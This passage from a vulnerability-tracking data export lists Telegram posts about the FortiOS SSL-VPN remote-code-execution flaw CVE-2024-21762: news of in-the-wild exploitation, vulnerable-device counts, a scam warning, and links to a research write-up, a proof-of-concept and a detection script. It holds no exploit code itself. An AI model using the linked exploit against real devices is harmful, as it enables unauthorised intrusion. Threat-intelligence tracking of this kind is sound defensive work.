\u043e\u0442\u0434\u0435\u043b\u044c\u043d\u044b\u0445 \u0430\u0442\u0430\u043a\u0430\u0445 \u0431\u043e\u043b\u0435\u0435 \u0438\u0437\u043e\u0449\u0440\u0435\u043d\u043d\u044b\u043c\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c\u0438.\n\n\u0413\u043b\u0443\u0431\u043e\u043a\u043e \u043f\u0440\u043e\u0430\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u0432\u0448\u0430\u044f \u043a\u043e\u0440\u0435\u043d\u043d\u044b\u0435 \u043f\u0440\u0438\u0447\u0438\u043d\u044b \u0434\u0432\u0443\u0445 \u043d\u0435\u0434\u0430\u0432\u043d\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u043f\u043e\u043c\u0438\u043c\u043e \u043d\u0430\u0437\u0432\u0430\u043d\u043d\u043e\u0439 \u0438 CVE-2024-23113, BishopFox \u043f\u043e\u0434\u0435\u043b\u0438\u043b\u0438\u0441\u044c \u0441\u043a\u0440\u0438\u043f\u0442\u043e\u043c Python \u0434\u043b\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438, \u0443\u044f\u0437\u0432\u0438\u043c\u044b \u043b\u0438 \u0438\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u044b SSL VPN.\n\n\u041d\u043e, \u043f\u043e \u0432\u0441\u0435\u0439 \u0432\u0438\u0434\u0438\u043c\u043e\u0441\u0442\u0438, \u043d\u0430\u0447\u0430\u0432\u0448\u0443\u044e\u0441\u044f \u0430\u0442\u0430\u043a\u0443 \u043d\u0430 \u0446\u0435\u043f\u043e\u0447\u043a\u0443 \u043c\u0443\u0434\u0430\u043a\u043e\u0432 \u0443\u0436\u0435 \u0432\u0440\u044f\u0434 \u043b\u0438 \u043e\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c. \u0411\u0443\u0434\u0435\u043c \u0441\u043b\u0435\u0434\u0438\u0442\u044c.", "creation_timestamp": "2024-03-11T12:01:50.000000Z"}, {"uuid": "02535089-0e7f-4cab-99ef-e97b512a34f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "https://t.me/ctinow/211367", "content": "https://ift.tt/9lKumoz\nUpdate: 133k+ Fortinet Appliances Still Vulnerable to CVE-2024-21762", "creation_timestamp": "2024-03-19T11:36:37.000000Z"}, {"uuid": "1f596d57-1771-42ad-8c35-7086a4147682", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "https://t.me/ctinow/204027", "content": "https://ift.tt/ElAnMFw\nCritical Fortinet FortiOS bug CVE-2024-21762 potentially impacts 150,000 internet-facing devices", "creation_timestamp": "2024-03-09T18:01:57.000000Z"}, {"uuid": "9d65985d-203d-43bf-b819-8bfbd6c548bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "https://t.me/ctinow/181944", "content": "https://ift.tt/waEvlTH\nCVE-2024-21762", "creation_timestamp": "2024-02-09T10:31:12.000000Z"}, {"uuid": "4fac4277-0721-4912-9372-e4d178d0a8c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "https://t.me/ctinow/182784", "content": "https://ift.tt/fHVzW7M\nCVE-2024-21762 | Fortinet FortiOS up to 7.4.2 SSL-VPN out-of-bounds write (FG-IR-24-015)", "creation_timestamp": "2024-02-11T14:07:12.000000Z"}, {"uuid": "f7860dc4-e2c9-47e7-980e-797aedcbb827", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "exploited", "source": "https://t.me/ctinow/183394", "content": "https://ift.tt/hMr7kQo\nCritical Fortinet FortiOS flaw exploited in the wild (CVE-2024-21762)", "creation_timestamp": "2024-02-12T20:46:28.000000Z"}, {"uuid": "eb0d3015-e9f2-49f9-84bb-7d8a766b4eb9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "https://t.me/HackerOne/3630", "content": "\ud83d\udea8CVE-2024-21762 Exploit and PoC Sales on GitHub\ud83d\udea8|\n\n\nAttention, cybersecurity community! A fraudulent scheme has emerged surrounding CVE-2024-21762, where individuals are purportedly selling exploits and proofs of concept (PoC) on GitHub. We urge caution and skepticism towards these claims. Genuine development of a 1-day exploit for such a vulnerability would command a price well in excess of $10,000. This discrepancy in valuation strongly suggests the offers are not legitimate. Please conduct thorough due diligence before engaging in any transactions related to cybersecurity exploits, and consider trusted channels for such exchanges. Stay informed and protect yourself from potential scams.", "creation_timestamp": "2024-03-26T10:43:09.000000Z"}, {"uuid": "75ede1d7-e2fc-4aa0-ba3d-5e101d69997d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "https://t.me/GDSpace/1202", "content": "\u041f\u0440\u043e\u0436\u0435\u043a\u0442\u043e\u0440 \u043f\u043e \u0418\u0411, \u0432\u044b\u043f\u0443\u0441\u043a \u211622 (10.02.2024): \u0412\u0438\u0436\u0443 MacBook \u2014 \u043c\u043d\u0435 \u043d\u0435\u043f\u0440\u0438\u044f\u0442\u043d\u043e\n\n\ud83d\udd38 \u0410\u043b\u0435\u043a\u0441\u0430\u043d\u0434\u0440 \u041b\u0435\u043e\u043d\u043e\u0432, \"\u0423\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c\u0438 \u0438 \u043f\u0440\u043e\u0447\u0435\u0435\"\n\ud83d\udd38 \u041b\u0435\u0432 \u041f\u0430\u043b\u0435\u0439, \"\u0412\u0435\u0441\u0442\u0438 \u0438\u0437 \u041f\u0430\u043b\u0435\u0439\"\n\ud83d\udd38 \u041c\u0430\u043a\u0441\u0438\u043c \u0425\u0430\u0440\u0430\u0441\u043a, \"Global Digital Space\"\n\n00:00 \u0417\u0434\u043e\u0440\u043e\u0432\u0430\u0435\u043c\u0441\u044f, \u0441\u043c\u043e\u0442\u0440\u0438\u043c \u0441\u0442\u0430\u0442\u0438\u0441\u0442\u0438\u043a\u0443, \u0440\u0430\u0437\u0433\u043e\u043d\u044f\u0435\u043c \u043f\u0440\u043e \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u044b Apple\n03:31 \u0413\u0434\u0435 \u0431\u044b\u043b \u041b\u0435\u0432: \u0421\u043e\u0431\u0438\u0440\u0430\u0435\u043c \u043a\u0430\u0440\u044c\u0435\u0440\u0443 \u0441  \u0415\u0432\u0433\u0435\u043d\u0438\u0435\u043c \u041f\u0438\u0442\u043e\u043b\u0438\u043d\u044b\u043c \u0438 \u0434\u0435\u0431\u0430\u0442\u044b \u043d\u0430 AM Live\n09:42 4 \u0430\u043f\u0440\u0435\u043b\u044f \u0441\u043e\u0441\u0442\u043e\u0438\u0442\u0441\u044f \u0444\u043e\u0440\u0443\u043c \"\u0422\u0435\u0440\u0440\u0438\u0442\u043e\u0440\u0438\u044f \u0411\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 - 2024: \u0432\u0441\u0435 pro \u0418\u0411\"\n13:42 \u041c\u0435\u043c \u043f\u0440\u043e \u0442\u044f\u0436\u0435\u043b\u0443\u044e \u043d\u0435\u0434\u0435\u043b\u044e \u0434\u043b\u044f Fortinet\n14:21 RCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Fortinet FortiOS \u0438 FortiProxy (CVE-2024-21762) \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0432\u0436\u0438\u0432\u0443\u044e\n19:16 Fortinet \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u043b\u0430 \u0434\u0432\u0435 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043c\u0430\u043a\u0441\u0438\u043c\u0430\u043b\u044c\u043d\u043e\u0439 \u0441\u0442\u0435\u043f\u0435\u043d\u0438 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0441\u0442\u0438 \u0432 FortiSIEM\n21:06 \u041e\u0447\u0435\u0440\u0435\u0434\u043d\u0430\u044f AuthBypass \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Ivanti Connect Secure, Ivanti Policy Secure \u0438 ZTA (CVE-2024-22024)\n23:02 \u0417\u0430\u043d\u0438\u043c\u0430\u0442\u0435\u043b\u044c\u043d\u0430\u044f \u0441\u0442\u0430\u0442\u044c\u044f \u043e\u0442 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0438\u0437 PT SWARM\n28:51 \u0412\u0437\u043b\u043e\u043c \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 AnyDesk \u0438 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 \u043e\u0442 \u041d\u041a\u0426\u041a\u0418\n33:51 \u041d\u0443\u0436\u0435\u043d \u043b\u0438 \u0410\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441 (\u0438\u043b\u0438 \u0448\u0438\u0440\u0435 - Endpoint Protection) \u043d\u0430 Linux \u0445\u043e\u0441\u0442\u0430\u0445?\n41:33 \u0411\u044b\u0432\u0448\u0435\u0433\u043e \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u0430 Apple \u043f\u0440\u0438\u0433\u043e\u0432\u043e\u0440\u0438\u043b\u0438 \u043a \u0442\u044e\u0440\u0435\u043c\u043d\u043e\u043c\u0443 \u0437\u0430\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044e \u0437\u0430 \u043a\u0440\u0430\u0436\u0443 \u0434\u0430\u043d\u043d\u044b\u0445 \u043e\u0431 \u0430\u0432\u0442\u043e\u043c\u043e\u0431\u0438\u043b\u0435\n44:47 \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u043e\u0431\u0432\u0438\u043d\u0438\u043b\u0438 \u0432 \u043f\u043e\u043f\u044b\u0442\u043a\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043e\u043a\u043e\u043b\u043e $3 \u043c\u043b\u043d \u0434\u043e\u043b\u043b\u0430\u0440\u043e\u0432 \u043e\u0442 Apple \u0432 \u0432\u0438\u0434\u0435 \u043f\u0440\u043e\u0434\u0443\u043a\u0446\u0438\u0438 \u0438 \u0443\u0441\u043b\u0443\u0433 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438\n49:38 \u0427\u0442\u043e \u0442\u0430\u043a\u043e\u0435 \u0418\u0433\u0440\u044b \u0411\u0443\u0434\u0443\u0449\u0435\u0433\u043e 2024?\n53:03 \u0411\u0430\u043d\u043a \u0420\u043e\u0441\u0441\u0438\u0438 \u0441\u043e\u0441\u0442\u0430\u0432\u0438\u043b \u043f\u043e\u0440\u0442\u0440\u0435\u0442 \u0436\u0435\u0440\u0442\u0432\u044b \u043a\u0438\u0431\u0435\u0440\u043c\u043e\u0448\u0435\u043d\u043d\u0438\u043a\u043e\u0432\n55:26 \ud83c\udfa4 Mr. X \u0438 \u041e\u043b\u0435\u0433 \u0422\u0438\u043d\u044c\u043a\u043e\u0432 \u043f\u043e\u044f\u0441\u043d\u044f\u044e\u0442 \u0437\u0430 \u044d\u0442\u043e\u0442 \u044d\u043f\u0438\u0437\u043e\u0434 \u041f\u0440\u043e\u0436\u0435\u043a\u0442\u043e\u0440\u0430 \u043f\u043e \u0418\u0411\n\n@avleonovrus #\u041f\u0440\u043e\u0436\u0435\u043a\u0442\u043e\u0440\u041f\u043e\u0418\u0411 #Apple #tb2024 #Fortinet #FortiOS #FortiProxy #FortiSIEM #Ivanti #AnyDesk #\u041d\u041a\u0426\u041a\u0418  #Linux #Antivirus #\u0418\u0433\u0440\u044b\u0411\u0443\u0434\u0443\u0449\u0435\u0433\u043e #PositiveTechnologies #PTSWARM", "creation_timestamp": "2024-02-12T06:19:49.000000Z"}, {"uuid": "9314f5cb-2563-4236-b685-91644e6092e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "exploited", "source": "https://t.me/xakep_ru/15512", "content": "\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u0431\u0430\u0433 \u0432 Fortinet \u0443\u0433\u0440\u043e\u0436\u0430\u0435\u0442 150 000 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\n\n\u0421\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u044b The Shadowserver Foundation \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0438, \u0447\u0442\u043e \u043e\u043a\u043e\u043b\u043e 150 000 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432 Fortinet FortiOS \u0438 FortiProxy \u043f\u043e-\u043f\u0440\u0435\u0436\u043d\u0435\u043c\u0443 \u0443\u044f\u0437\u0432\u0438\u043c\u044b \u043f\u0435\u0440\u0435\u0434 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u043e\u0439 CVE-2024-21762, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u0439 \u0432 \u043f\u0440\u043e\u0448\u043b\u043e\u043c \u043c\u0435\u0441\u044f\u0446\u0435. \u041e\u043d\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u0434 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438.\n\nhttps://xakep.ru/2024/03/12/cve-2024-21762-stats/", "creation_timestamp": "2024-03-12T13:35:25.000000Z"}, {"uuid": "15dd22da-83bc-47c4-bdd7-6ff4d882d7b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "exploited", "source": "https://t.me/information_security_channel/51506", "content": "Fortinet Warns of New FortiOS Zero-Day\nhttps://www.securityweek.com/fortinet-warns-of-new-fortios-zero-day/\n\nFortinet patches CVE-2024-21762, a critical remote code execution vulnerability that may have been exploited in the wild.\nThe post Fortinet Warns of New FortiOS Zero-Day (https://www.securityweek.com/fortinet-warns-of-new-fortios-zero-day/) appeared first on SecurityWeek (https://www.securityweek.com/).", "creation_timestamp": "2024-02-09T13:43:58.000000Z"}, {"uuid": "72d9a1ae-33ae-40ca-a722-f396f137017c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "https://t.me/information_security_channel/51705", "content": "Possibly Exploited Fortinet Flaw Impacts Many Systems, but No Signs of Mass Attacks\nhttps://www.securityweek.com/possibly-exploited-fortinet-flaw-impacts-many-systems-but-still-no-sign-of-mass-attacks/\n\n150,000 systems possibly impacted by the recent Fortinet vulnerability \u200b\u200bCVE-2024-21762, but there is still no evidence of widespread exploitation.\u00a0\nThe post Possibly Exploited Fortinet Flaw Impacts Many Systems, but No Signs of Mass Attacks (https://www.securityweek.com/possibly-exploited-fortinet-flaw-impacts-many-systems-but-still-no-sign-of-mass-attacks/) appeared first on SecurityWeek (https://www.securityweek.com/).", "creation_timestamp": "2024-03-11T16:59:16.000000Z"}, {"uuid": "9ed08489-61f4-46a2-8274-edac16dc182a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "exploited", "source": "https://t.me/thehackernews/4526", "content": "\ud83d\uded1 Urgent: Patch it now - Hackers are exploiting it! \n \nFortinet has unveiled a critical security flaw in its SSL VPN, CVE-2024-21762, allowing hackers to execute arbitrary code. \n \nLearn more: https://thehackernews.com/2024/02/fortinet-warns-of-critical-fortios-ssl.html", "creation_timestamp": "2024-02-09T06:40:49.000000Z"}, {"uuid": "2ed70f88-2cf5-4134-a6ac-2dc9c8af64e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "exploited", "source": "https://t.me/xakep_ru/15368", "content": "\u0421\u0432\u0435\u0436\u0438\u0439 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u0431\u0430\u0433 \u0432 FortiOS SSL VPN \u0443\u0436\u0435 \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u043f\u043e\u0434 \u0430\u0442\u0430\u043a\u0430\u043c\u0438\n\n\u0420\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 Fortinet \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u044e\u0442, \u0447\u0442\u043e \u043d\u043e\u0432\u0430\u044f \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f RCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 FortiOS SSL VPN \u0443\u0436\u0435 \u043c\u043e\u0436\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0434\u043b\u044f \u0430\u0442\u0430\u043a. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a CVE-2024-21762 \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 9,6 \u0431\u0430\u043b\u043b\u043e\u0432 \u043f\u043e \u0448\u043a\u0430\u043b\u0435 CVSS. \u0411\u0430\u0433 \u0432 FortiOS \u0441\u0432\u044f\u0437\u0430\u043d \u0441 out-of-bounds \u0437\u0430\u043f\u0438\u0441\u044c\u044e \u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0435\u0430\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434.\n\nhttps://xakep.ru/2024/02/09/fortios-ssl-vpn-rce/", "creation_timestamp": "2024-02-09T13:55:28.000000Z"}, {"uuid": "58589bc8-7ff0-46b2-9d8d-89261d723b01", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "exploited", "source": "https://t.me/thehackernews/6654", "content": "\u26a1 Even patching won't save you.\n\nFortinet confirms attackers kept read-only access to FortiGate devices after patching old flaws (CVE-2022-42475, CVE-2023-27997, CVE-2024-21762) via hidden symlink in SSL-VPN.\n\nFull details \ud83d\udc49 https://thehackernews.com/2025/04/fortinet-warns-attackers-retain.html", "creation_timestamp": "2025-04-11T19:59:10.000000Z"}, {"uuid": "27e2d1e9-2b79-44fd-9f1d-b82317935509", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "https://t.me/haccking/10645", "content": "CVE-2024-21762 FortiGate  Unauthenticated Remote Code Execution (RCE)\n\n\u041a\u043e\u043c\u0430\u043d\u0434\u0430 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 Assetnote \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u043b\u0430 \u043e\u0447\u0435\u0440\u0435\u0434\u043d\u043e\u0439 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u044b\u0439 \u0440\u0435\u0441\u0451\u0440\u0447. \u041d\u0430 \u044d\u0442\u043e\u0442 \u0440\u0430\u0437 \u044d\u0442\u043e pre-auth RCE \u0432 FortiGate SSLVPN (CVE-2024-21762) \u043e \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u043c\u044b \u043f\u0438\u0441\u0430\u043b\u0438 \u0440\u0430\u043d\u0435\u0435.\n\n\u0412 \u0441\u0442\u0430\u0442\u044c\u0435 \u043c\u043e\u0436\u043d\u043e \u043d\u0430\u0439\u0442\u0438 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0435 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u043a\u0430\u0436\u0434\u043e\u0433\u043e \u0448\u0430\u0433\u0430: \u043e\u0442 \u0438\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u0438\u044f \u0431\u0438\u043d\u0430\u0440\u0435\u0439 \u0434\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0449\u0435\u0433\u043e \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430.\n\n\u0421\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u0440\u0435\u0441\u0451\u0440\u0447\n\n\u0421\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 PoC (proof-of-concept)\n\nP.S. \u0411\u043e\u043b\u0435\u0435 133 000 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432 Fortinet \u043f\u043e-\u043f\u0440\u0435\u0436\u043d\u0435\u043c\u0443 \u0443\u044f\u0437\u0432\u0438\u043c\u044b \u043a \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u043c \u043e\u0448\u0438\u0431\u043a\u0430\u043c \u043c\u0435\u0441\u044f\u0447\u043d\u043e\u0439 \u0434\u0430\u0432\u043d\u043e\u0441\u0442\u0438.\n\nLH | \u041d\u043e\u0432\u043e\u0441\u0442\u0438 | \u041a\u0443\u0440\u0441\u044b | \u041c\u0435\u043c\u044b", "creation_timestamp": "2024-04-11T11:22:17.000000Z"}, {"uuid": "75a14869-36ab-4444-be47-b3e36c0379de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2321", "content": "https://github.com/BishopFox/cve-2024-21762-check\n\nSafely detect whether a FortiGate SSL VPN is vulnerable to CVE-2024-21762\n#github #exploit", "creation_timestamp": "2024-04-15T15:59:51.000000Z"}, {"uuid": "a2415a11-495f-4e17-bad4-d865480fab59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "https://t.me/thebugbountyhunter/8464", "content": "Two Bytes is Plenty: FortiGate RCE with CVE-2024-21762\n\nhttps://www.assetnote.io/resources/research/two-bytes-is-plenty-fortigate-rce-with-cve-2024-21762", "creation_timestamp": "2024-03-17T10:54:40.000000Z"}, {"uuid": "b5d1db75-e249-4b02-bb03-c2ce4b360022", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/10222", "content": "#exploit\nCVE-2024-21762:\nFortiOS 6.0 - 7.4 - OoB/RCE", "creation_timestamp": "2024-10-08T20:26:39.000000Z"}, {"uuid": "18aa01eb-e84d-4729-b65b-eec5d7ca8add", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/10336", "content": "#tools\n#Blue_Team_Techniques\n1. Tool to dump information about XPI files\nhttps://github.com/willdurand/xpidump\n2. CVE-2024-21762 (FortiGate SSL VPN) Check\nhttps://github.com/BishopFox/cve-2024-21762-check", "creation_timestamp": "2024-04-15T17:35:31.000000Z"}]}